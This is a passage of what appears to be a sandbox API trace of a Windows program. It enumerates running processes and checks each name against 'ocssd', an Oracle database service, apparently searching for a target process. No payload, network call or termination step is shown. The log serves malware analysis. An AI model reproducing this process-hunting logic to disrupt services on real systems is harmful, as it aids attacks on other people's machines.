th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.404] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35443a8 [0092.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35443a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.404] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocssd") returned 0x0 [0092.404] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.405] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3544318 [0092.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3544318, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.406] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocssd") returned 0x0 [0092.406] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.407] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35441e0 [0092.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35441e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.407] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.407] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.408] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547868 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547868, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0092.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0092.409] StrStrIA (lpFirst="dwm.exe", lpSrch="ocssd") returned 0x0 [0092.409] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.411] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544330 [0092.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.411] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.411] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.411] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.412] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544438 [0092.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.412] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.412] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.413] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35441f8 [0092.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35441f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.414] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.414] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.414] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.415] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544258 [0092.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544258, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.415] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.415] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.416] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544240 [0092.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544240, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.416] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.416] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.418] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544270 [0092.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.418] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.418] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.419] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544468 [0092.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.419] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.419] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.421] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544348 [0092.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544348, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.421] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.421] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.421] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.422] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544288 [0092.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.423] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.423] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.423] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.448] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544210 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544210, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.448] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.448] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.448] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0092.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.449] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544378 [0092.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3544378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0092.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0092.449] StrStrIA (lpFirst="spoolsv.exe", lpSrch="ocssd") returned 0x0 [0092.450] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.451] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35443d8 [0092.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35443d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.451] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.451] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0092.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.452] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35443f0 [0092.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35443f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0092.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0092.452] StrStrIA (lpFirst="audiodg.exe", lpSrch="ocssd") returned 0x0 [0092.452] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0092.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.453] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544228 [0092.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3544228, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0092.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0092.453] StrStrIA (lpFirst="sihost.exe", lpSrch="ocssd") returned 0x0 [0092.453] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.455] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544480 [0092.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3544480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.455] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.455] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.456] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544498 [0092.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3544498, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.456] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.456] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocssd") returned 0x0 [0092.456] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0092.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.458] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35441b0 [0092.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x35441b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0092.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0092.458] StrStrIA (lpFirst="explorer.exe", lpSrch="ocssd") returned 0x0 [0092.458] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0092.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.459] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3542fd8 [0092.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3542fd8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0092.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0092.459] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="ocssd") returned 0x0 [0092.459] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0092.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.461] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x353c240 [0092.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x353c240, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0092.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0092.461] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="ocssd") returned 0x0 [0092.461] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, 